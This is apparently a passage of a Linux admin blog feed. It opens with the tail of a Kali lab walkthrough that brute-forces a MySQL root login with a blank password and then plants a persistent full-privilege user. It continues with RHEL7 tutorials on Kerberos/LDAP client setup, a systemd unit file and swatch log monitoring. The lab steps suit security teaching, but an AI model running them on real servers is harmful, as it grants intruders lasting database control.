<span style="color: red;">[+] 192.168.122.74:3306 MYSQL - Success: 'root:'</span><br />
[*] Scanned 1 of 1 hosts (100% complete)<br />
[*] Auxiliary module execution completed<br />
sf auxiliary(mysql_login) > <b>quit</b><br />
root@kali:~#<br />
<br />
<br />
3) We are lucky. Now we will log in to the mysql server with user 'root' and blank password.<br />
<br />
root@kali:~# <b>mysql -u root -h 192.168.122.74</b><br />
<br />
<br />
3) We create a user 'shabbir' with password 'shabbir' having full administrative control over the mysql database.<br />
<br />
mysql> <b>grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';</b><br />
Query OK, 0 rows affected (0.00 sec)<br />
<br />
mysql> <b>quit</b><br />
Bye<br />
<br />
<br />
4) We can now log in to the mysql database whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.<br />
<br />
root@kali:~# <b>mysql -u shabbir -h 192.168.122.74 -p</b><br />
Enter password:<br />
<br />
mysql> <b>show databases;</b><br />
+--------------------+<br />
| Database |<br />
+--------------------+<br />
| information_schema |<br />
| dvwa |<br />
| metasploit |<br />
| mysql |<br />
| owasp10 |<br />
| tikiwiki |<br />
| tikiwiki195 |<br />
+--------------------+<br />
7 rows in set (0.00 sec)<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-34258422854244139202015-06-06T14:53:00.000+05:302015-06-21T21:36:17.143+05:30Configure Kerberos Authentication in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will configure a client machine to use Kerberos authentication. We will use a LDAP server for user information. <br />
<br />
For Kerberos Server configuration, refer to this <span id="goog_1209312757"></span><a href="http://linux-hacking-guide.blogspot.in/2015/04/kerberos-configuration-in-rhel7centos7.html" target="_blank">post<span id="goog_1209312758"></span></a>. For LDAP Server configuration, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/04/ldap-authentication-server-in-rhel7.html" target="_blank">post</a>.<br />
<br />
We use the System Security Services Daemon (SSSD) for user information
services and authentication, instead of the legacy services.<br />
<br />
We use the authconfig tool for authentication configuration. <br />
If <span style="color: red;">--test</span> action is specified, the
authconfig just reads the current settings from the various
configuration files and prints their values. If <span style="color: red;">--update</span> action is specified, authconfig must be run by root, and configuration changes are saved.<br />
<br />
Each <span style="color: red;">--enable</span> has a matching <span style="color: blue;"><span style="color: red;">--disable</span> </span>option that disables the service if it is already enabled. <br />
<br />
Consider the following scenario:<br />
<br />
Kerberos Realm: MYCOMPANY.COM<br />
Kerberos Server: meru.mycompany.com<br />
<br />
LDAP Server: oserver1.mycompany.com<br />
LDAP Base DN: dc=my-domain,dc=com<br />
<br />
Client Machine: server2.mycompany.com <br />
<br />
NOTE: 1) Ensure that time synchronization is maintained between all the machines. Kerberos requires accurate time synchronization to work properly. <br />
2) Ensure that host name resolution is working. Configure DNS Server or /etc/hosts.<br />
<br />
Perform the following steps on the client machine:<br />
<br />
1) Install packages<br />
[root@server2 ~]# <b>yum install sssd* openldap-clients pam_krb5 krb5-workstation </b><br />
<br />
2) Configure LDAP<br />
[root@server2 ~]# <b>authconfig --enableldap --ldapserver="ldap://oserver1.mycompany.com:389" --ldapbasedn="dc=my-domain,dc=com" --update</b><br />
<br />
Where, <br />
<span style="color: red;">--enableldap</span> -> Use LDAP as an Identity Store. Configures user information services in /etc/nsswitch.conf. <br />
<br />
<span style="color: red;">--ldapserver="ldap://oserver1.mycompany.com:389" <span style="color: black;">-> The URL of the LDAP Server. </span></span><span style="color: red;"><span style="color: black;">This usually requires both the host name and port number of the LDAP server.</span></span><br />
<br />
<span style="color: red;">--ldapbasedn="dc=my-domain,dc=com"</span> -> gives the root suffix or <span class="emphasis"><i>distinguished name</i></span> (DN) for the user directory. All of the user entries will exist below this parent entry.<br />
<br />
<br />
3) Test connection to LDAP server. We assume that an entry for user 'katrina' is present in the LDAP database.<br />
[root@server2 ~]# <b>ldapsearch '(uid=katrina)'</b><br />
<br />
<br />
4) Configure Kerberos<br />
[root@server2 ~]# <b>authconfig --enablekrb5 --krb5realm MYCOMPANY.COM --krb5kdc meru.mycompany.com --krb5adminserver meru.mycompany.com --update</b><br />
<br />
Where, <br />
<span style="color: red;">--enablekrb5</span> -> Enable Kerberos authentication. <br />
<br />
--<span style="color: red;">krb5realm MYCOMPANY.COM</span> -> Kerberos realm <br />
<br />
--<span style="color: red;">krb5kdc meru.mycompany.com</span> -> Host name of the Kerberos KDC Server<br />
<br />
--<span style="color: red;">krb5adminserver meru.mycompany.com</span> -> Host name of the Kerberos admin server<br />
<br />
<br />
5) Create user principal for 'katrina' in Kerberos database.<br />
[root@server2 ~]# <b>kadmin -p shabbir/admin -w shabbir</b><br />
Authenticating as principal shabbir/admin with password.<br />
kadmin: <b>add_principal katrina</b><br />
WARNING: no policy specified for katrina@MYCOMPANY.COM; defaulting to no policy<br />
Enter password for principal "katrina@MYCOMPANY.COM": <br />
Re-enter password for principal "katrina@MYCOMPANY.COM": <br />
Principal "katrina@MYCOMPANY.COM" created.<br />
<br />
6) Verify Kerberos Operation<br />
[root@server2 ~]# <b>kinit katrina </b><br />
<b> </b>Password for katrina@MYCOMPANY.COM: <br />
<br />
[root@server2 ~]# <b>klist</b><br />
Ticket cache: KEYRING:persistent:0:0<br />
Default principal: <span style="color: red;">katrina@MYCOMPANY.COM</span><br />
<br />
Valid starting Expires Service principal<br />
06/06/2015 10:51:37 06/07/2015 10:51:37 krbtgt/MYCOMPANY.COM@MYCOMPANY.COM<br />
renew until 06/06/2015 10:51:37<br />
<br />
[root@server2 ~]# <b>kdestroy</b><br />
<br />
<br />
7) Create home directory on first login (if it doesnot exist).<br />
[root@server2 ~]# <b>authconfig --enablemkhomedir --update</b><br />
<br />
8) Verify configuration changes<b> </b><br />
[root@server2 ~]# <b>authconfig --test</b><br />
<br />
9) <span style="color: black;">Comment entry for user 'katrina' in '/etc/passwd' if exists.</span><br />
<br />
10) Run the below command to verify that user information retrieval from LDAP server is working.<br />
[root@server2 ~]# <b>getent passwd katrina</b><br />
katrina:x:1002:1002::/home/katrina:/bin/bash<br />
<br />
11) Log in as user 'katrina' and enter password as given for user principal 'katrina' in the Kerberos database.<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-52907751156710914272015-06-04T18:01:00.000+05:302015-06-21T21:35:29.639+05:30Create Custom Unit File (to run a Custom Daemon) in systemd in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In a previous post we configured Swatch Log Monitoring Tool. In this post we will configure swatch as a custom daemon in 'systemd' by creating a custom unit file in 'systemd' and loading it into 'systemd'.<br />
<br />
<br />
Perform the following steps:<br />
<br />
1) Create a unit file in /etc/systemd/system/ directory.<br />
[root@meru ~]# <b>touch /etc/systemd/system/swatch.service</b><br />
<br />
[root@meru ~]# <b>chmod 664 /etc/systemd/system/swatch.service</b><br />
<br />
<br />
2) Edit the Unit File.<br />
<b>[root@meru ~]# vi /etc/systemd/system/swatch.service</b><br />
<br />
<b>[Unit]</b><br />
<b>Description=Swatch Log Monitoring Daemon</b><br />
<b>After=syslog.target network.target auditd.service sshd.service</b><br />
<b><br /></b>
<b>[Service]</b><br />
<b>ExecStart=/bin/swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --pid-file=/var/run/swatch.pid --daemon</b><br />
<b>ExecStop=kill -s KILL $(cat /var/run/swatch.pid)</b><br />
<b>Type=forking</b><br />
<b>PIDFile=/var/run/swatch.pid</b><br />
<b><br /></b>
<b>[Install]</b><br />
<b>WantedBy=multi-user.target</b><br />
<br />
<br />
<div class="para">
Where:
</div>
<div class="itemizedlist">
<ul>
<li class="listitem"><div class="para">
<em class="replaceable">Description</em> is an informative description that is displayed in journal log files and in the output of the <code class="command">systemctl status</code> command. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
A<i>fter</i> setting ensures that the
service is started only after the given space-separated list of services or targets are running.</div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<em class="replaceable">ExecStart</em> stands for the path to the actual service executable. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<code></code><i>Type=forking</i> is used for daemons that make the fork system call. The main process of the service is created with the PID specified in <em class="replaceable">PIDFile</em>. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<code></code><i>WantedBy</i> states the target or
targets that the service should be started under.
</div>
</li>
</ul>
</div>
<br />
<br />
3) Notify systemd about the new swatch.service file.<br />
[root@meru system]# <b>systemctl daemon-reload</b><br />
<br />
4) Start Swatch service<br />
[root@meru system]# <b>systemctl start swatch.service</b><br />
<br />
You can now use all systemctl commands for swatch.service. </div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-11611110765687790612015-06-04T10:12:00.000+05:302015-06-21T21:36:17.123+05:30Log Monitoring using Swatch in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
The Simple WATCHer is a log monitoring tool that constantly searches log files and alerts system administrators of anything that matches the patterns described in the configuration file.<br />
<br />
It’s an efficient way to monitor system events like failed login attempts, installation of new packages etc <br />
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
<i>swatch</i>,
a free
log-monitoring utility written 100% in Perl, monitors logs as
they're being written and takes action when it finds
something you've told it to look out for. Swatch
does for logs what tripwire does for system-file integrity.
- See more at:
http://etutorials.org/Linux+systems/secure+linux-based+servers/Chapter+10.+System+Log+Management+and+Monitoring/Section+10.5.+Using+Swatch+for+Automated+Log+Monitoring/#sthash.ai9veCh9.dpuf</div>
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
<i>swatch</i>,
a free
log-monitoring utility written 100% in Perl, monitors logs as
they're being written and takes action when it finds
something you've told it to look out for. Swatch
does for logs what tripwire does for system-file integrity.
- See more at:
http://etutorials.org/Linux+systems/secure+linux-based+servers/Chapter+10.+System+Log+Management+and+Monitoring/Section+10.5.+Using+Swatch+for+Automated+Log+Monitoring/#sthash.ai9veCh9.dpuf</div>
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
<i>swatch</i>,
a free
log-monitoring utility written 100% in Perl, monitors logs as
they're being written and takes action when it finds
something you've told it to look out for. Swatch
does for logs what tripwire does for system-file integrity.
- See more at:
http://etutorials.org/Linux+systems/secure+linux-based+servers/Chapter+10.+System+Log+Management+and+Monitoring/Section+10.5.+Using+Swatch+for+Automated+Log+Monitoring/#sthash.ai9veCh9.dpuf</div>
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
<i>swatch</i>,
a free
log-monitoring utility written 100% in Perl, monitors logs as
they're being written and takes action when it finds
something you've told it to look out for. Swatch
does for logs what tripwire does for system-file integrity.
- See more at:
http://etutorials.org/Linux+systems/secure+linux-based+servers/Chapter+10.+System+Log+Management+and+Monitoring/Section+10.5.+Using+Swatch+for+Automated+Log+Monitoring/#sthash.ai9veCh9.dpuf</div>
<br />
Swatch uses two required fields:
<br />
<ul>
<li><span style="color: red;">Pattern</span>: A regular expression to search in the log file. </li>
<li><span style="color: red;">Action</span>: The action to perform for a pattern match, like output the log entry to the console, send an email, or execute a script.</li>
</ul>
Consider the following example:<br />
<br />
<div class="perl" style="text-align: left;">
<span style="color: red;"><span style="font-family: inherit;"><span style="color: black;">[root@server1 ~]# vi<b> </b>/etc/swatch/secure.conf </span></span></span><br />
<span style="color: red;"><span style="font-family: inherit;">watchfor /ssh.*: session opened for user/ </span></span></div>
<div class="perl" style="text-align: left;">
<span style="color: red;"><span style="font-family: inherit;">echo bold</span></span></div>
<span style="color: red;">mail=root@server1.mycompany.com, subject="</span><span style="color: red;">Successful SSH Login"</span><br />
<br />
<br />
<span style="color: red;"><span style="color: red;"><span style="font-family: inherit;"><span style="color: black;">[root@server1 ~]# </span></span></span>swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --daemon</span><br />
<br />
In the above example, Swatch will search the /var/log/secure log file continuously for the regular expression defined in the /etc/swatch/secure.conf config file and will output the log entry to the console on every successful SSH login and also mail the log entry to root@server1.mycompany.com. <br />
<br />
--daemon option means that Swatch will run as a daemon (background process).<br />
<br />
<br />
Perform the following steps:<br />
<br />
1) Install EPEL Repository <br />
[root@server1 ~]# <b>yum install epel-release</b><br />
<br />
2) Install packages<br />
[root@server1 ~]# <b>yum install swatch</b><br />
<br />
3)<b> </b>Create config directory and configuration files<br />
[root@server1 ~]# <b>mkdir /etc/swatch</b><br />
<br />
3.1) Monitor <span style="color: red;">failed login attempts, successful root logins, failed SSH login attempts, successful SSH root login</span>, in the /var/log/secure log file.<br />
[root@server1 ~]# <b>vi /etc/swatch/secure.conf</b><br />
<br />
<b>watchfor /FAILED/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b>server1.mycompany.com, subject="Failed Login Attempt"</b><br />
<br />
<b>watchfor /ROOT LOGIN/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b>server1.mycompany.com, subject="Successful Root Login"</b><br />
<br />
<b>watchfor /ssh.*: Failed password/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b><b>server1</b>.mycompany.com, subject="Failed SSH Login Attempt"</b><br />
<br />
<span style="color: #444444;"><b><span style="font-family: inherit;">watchfor /ssh.*: session opened for user root/ </span></b></span><br />
<div class="perl" style="text-align: left;">
<span style="color: #444444;"><b><span style="font-family: inherit;">echo bold</span></b></span></div>
<b>mail=root@</b><b><b>server1</b>.mycompany.com, subject="Successful SSH Root Login"</b><br />
<br />
<br />
3.2) Monitor <span style="color: red;">installation of packages</span> in /var/log/messages log file.<br />
[root@server1 ~]# <b>vi /etc/swatch/messages.conf</b><br />
<br />
<b>watchfor /Installed/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b><b>server1</b>.mycompany.com, subject="Installed New Package"</b><br />
<br />
<br />
<br />
4) Execute Swatch<br />
[root@server1 ~]# <b>swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --daemon</b><br />
<br />
[root@server1 ~]# <b>swatch --config-file=/etc/swatch/messages.conf --tail-file=/var/log/messages --daemon</b><br />
<br />
<br />
In this post we have manually started swatch. In the
next post we will configure swatch as a custom daemon in 'systemd' by
creating a custom unit file in 'systemd' and loading it into 'systemd'.<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2